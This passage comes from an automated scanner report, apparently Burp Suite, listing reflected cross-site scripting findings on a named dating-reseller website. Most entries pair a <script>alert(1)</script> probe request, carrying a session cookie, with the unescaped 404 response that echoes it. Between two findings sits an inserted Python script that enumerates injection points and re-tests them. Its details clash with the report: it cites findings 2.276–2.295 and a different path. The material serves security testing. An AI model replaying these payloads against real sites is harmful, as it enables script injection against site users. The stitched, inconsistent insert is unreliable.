2.264. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8323c<script>alert(1)</script>d3d5a817fa1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images8323c<script>alert(1)</script>d3d5a817fa1/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images8323c<script>alert(1)</script>d3d5a817fa1/review/0.gif was not found on this server.</p>
...[SNIP]...

2.265. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1b3f1<script>alert(1)</script>6cb63beba06 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review1b3f1<script>alert(1)</script>6cb63beba06/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review1b3f1<script>alert(1)</script>6cb63beba06/0.gif was not found on this server.</p>
...[SNIP]...

2.266. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d950e<script>alert(1)</script>19391641d1b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/0.gifd950e<script>alert(1)</script>19391641d1b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/0.gifd950e<script>alert(1)</script>19391641d1b was not found on this server.</p>
...[SNIP]...

2.267. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31005<script>alert(1)</script>5942e40aab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/0.gif?31005<script>alert(1)</script>5942e40aab8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/0.gif?31005<script>alert(1)</script>5942e40aab8=1 was not found on this server.</p>
...[SNIP]...

2.268. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0d9<script>alert(1)</script>f6a6f3be497 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultba0d9<script>alert(1)</script>f6a6f3be497/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultba0d9<script>alert(1)</script>f6a6f3be497/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.269. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd177<script>alert(1)</script>4b95502feeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingcd177<script>alert(1)</script>4b95502feeb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingcd177<script>alert(1)</script>4b95502feeb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.270. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 25147<script>alert(1)</script>d9eed647b90 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes25147<script>alert(1)</script>d9eed647b90/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes25147<script>alert(1)</script>d9eed647b90/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.271. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26d54<script>alert(1)</script>7df46541d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos26d54<script>alert(1)</script>7df46541d1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos26d54<script>alert(1)</script>7df46541d1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.272. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7013<script>alert(1)</script>7d27e23178d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesf7013<script>alert(1)</script>7d27e23178d/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesf7013<script>alert(1)</script>7d27e23178d/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.273. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 19bb5<script>alert(1)</script>a7ee12cf09c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review19bb5<script>alert(1)</script>a7ee12cf09c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review19bb5<script>alert(1)</script>a7ee12cf09c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.274. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3cf30<script>alert(1)</script>15a586871d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php3cf30<script>alert(1)</script>15a586871d2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php3cf30<script>alert(1)</script>15a586871d2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.275. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c839d<a>14c9e0990d2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc839d<a>14c9e0990d2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc839d<a>14c9e0990d2&opt=2 was not found on this server.</p>
...[SNIP]...

2.276. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ce11d<a>3a9ea53d457 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...ce11d<a>3a9ea53d457&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...ce11d<a>3a9ea53d457&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.277. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b62be<script>alert(1)</script>fd62e23d993 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&b62be<script>alert(1)</script>fd62e23d993=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&b62be<script>alert(1)</script>fd62e23d993=1 was not found on this server.</p>
...[SNIP]...
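Every finding from 2.276 to 2.295 in this section reflects the input at the same place: the site's own 404 page drops the requested URL into `<p>The requested URL ... was not found on this server.</p>` without encoding it, so a probe placed in any path segment, any query value or a new parameter name comes back as live markup. The script below is an added example, not part of the Burp report and not code from the target site. It reproduces the scanner's reflection test offline against two constructed stand-ins for that 404 handler (one echoing the raw request URI, one entity-encoding it; the real handler's source is not shown in the report, so the raw-echo behaviour is an assumption drawn from the responses above), mirrors the scanner's "Certain" versus "Firm" verdicts, enumerates the same injection points the report lists, and adds the one re-test the report leaves to the reader: a browser percent-encodes `<` and `>` in a URL before sending, so whether the live handler decodes before echoing decides whether a plain link reaches the sink or only a raw-socket client does. The marker strings `c7a9c`/`63816aeb1cb` are fixed here for reproducibility; the scanner randomises them.

```python
"""Added example, not part of the Burp report or the target site: reproduces
the reflection test behind issues 2.276-2.295 offline.  The two 404 handlers
below are constructed stand-ins (assumption: the live PHP handler echoes the
raw request URI, as the responses above suggest; its source is not shown)."""
import html
from urllib.parse import parse_qsl, quote, urlsplit

SCRIPT_PROBE = "<script>alert(1)</script>"   # probe behind the "Certain" findings
TAG_PROBE = "<a>"                           # probe behind the "Firm" findings
PRE, POST = "c7a9c", "63816aeb1cb"          # fixed markers (the scanner randomises them)

# Target taken from the report; the literal "search..." is the value it used.
TARGET = ("/adult/personals-dating/themes/kosmos/images/search.php"
          "?keyword=search...&Submit3=Search&opt=2")


def vulnerable_404(request_uri: str) -> str:
    """Stand-in for the site's 404 page: the request URI goes into a <p>
    unescaped, exactly the sink every finding in this section points at."""
    return ("<!DOCTYPE html><html><head><title>Error 404 - Page Not Found"
            f"</title></head><body><p>The requested URL {request_uri} "
            "was not found on this server.</p></body></html>")


def fixed_404(request_uri: str) -> str:
    """Same page with the fix: entity-encode the URI before it hits the markup
    (the PHP equivalent is htmlspecialchars($uri, ENT_QUOTES))."""
    safe = html.escape(request_uri, quote=True)
    return ("<!DOCTYPE html><html><head><title>Error 404 - Page Not Found"
            f"</title></head><body><p>The requested URL {safe} "
            "was not found on this server.</p></body></html>")


def classify(body: str, probe: str) -> str:
    """Scanner-style verdict for one response.  'Certain' = a <script> probe came
    back byte-for-byte; 'Firm' = only a harmless tag did; 'html-encoded' and
    'percent-encoded' mean the markers are there but the brackets are not live."""
    canary = f"{PRE}{probe}{POST}"
    if canary in body:
        return "Certain" if probe == SCRIPT_PROBE else "Firm"
    if f"{PRE}{html.escape(probe, quote=True)}{POST}" in body:
        return "html-encoded"
    if quote(canary, safe="") in body:
        return "percent-encoded"
    return "absent"


def injection_points(url: str):
    """Yield (label, builder) for each location the report tested: every path
    segment ("REST URL parameter N"), every query value, and a new parameter name."""
    parts = urlsplit(url)
    segments = parts.path.strip("/").split("/")
    params = parse_qsl(parts.query, keep_blank_values=True)

    def rebuild(segs, prms):
        query = "&".join(f"{k}={v}" for k, v in prms)
        return "/" + "/".join(segs) + (f"?{query}" if query else "")

    for i in range(len(segments)):
        yield (f"REST URL parameter {i + 1}", lambda c, i=i: rebuild(
            segments[:i] + [segments[i] + c] + segments[i + 1:], params))
    for j, (k, _) in enumerate(params):
        yield (f"{k} parameter", lambda c, j=j: rebuild(
            segments, params[:j] + [(params[j][0], params[j][1] + c)] + params[j + 1:]))
    yield ("name of an arbitrarily supplied request parameter",
           lambda c: rebuild(segments, params + [(c, "1")]))


def scan(handler, url: str, probe: str) -> dict:
    """Push one probe through every injection point and return {label: verdict},
    one entry per location, the way the report lists one issue per location."""
    canary = f"{PRE}{probe}{POST}"
    return {label: classify(handler(build(canary)), probe)
            for label, build in injection_points(url)}


def browser_encoded_check(handler, url: str, probe: str) -> str:
    """The re-test the report leaves to the reader: a browser percent-encodes
    '<' and '>' before sending, so resend the probe that way.  'Certain' means
    the handler decodes before echoing and a plain link triggers the bug;
    'percent-encoded' means only a raw-socket client reaches the sink."""
    canary = quote(f"{PRE}{probe}{POST}", safe="")
    return classify(handler(f"{url}&{canary}=1"), probe)


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_404), ("fixed", fixed_404)):
        print(f"== {name} handler, probe {SCRIPT_PROBE}")
        for label, verdict in scan(handler, TARGET, SCRIPT_PROBE).items():
            print(f"   {label:55} {verdict}")
    print("browser-encoded probe, vulnerable stand-in:",
          browser_encoded_check(vulnerable_404, TARGET, SCRIPT_PROBE))
```

Against the raw-echo stand-in the script returns "Certain" for all ten locations (six path segments, three query values, one parameter name), matching the one-issue-per-location layout of this section, and "html-encoded" for every location once the handler escapes its output, which is why the fix belongs in the 404 template rather than in per-parameter validation. The "Firm" findings above use the same sink as the "Certain" ones, so the same template fix closes both. To rerun the percent-encoding check against the live target, replace the stand-in handler with a function that performs the HTTP request and returns the response body.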

2.278. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b1982<a>1b56b5dc871 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2b1982<a>1b56b5dc871 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
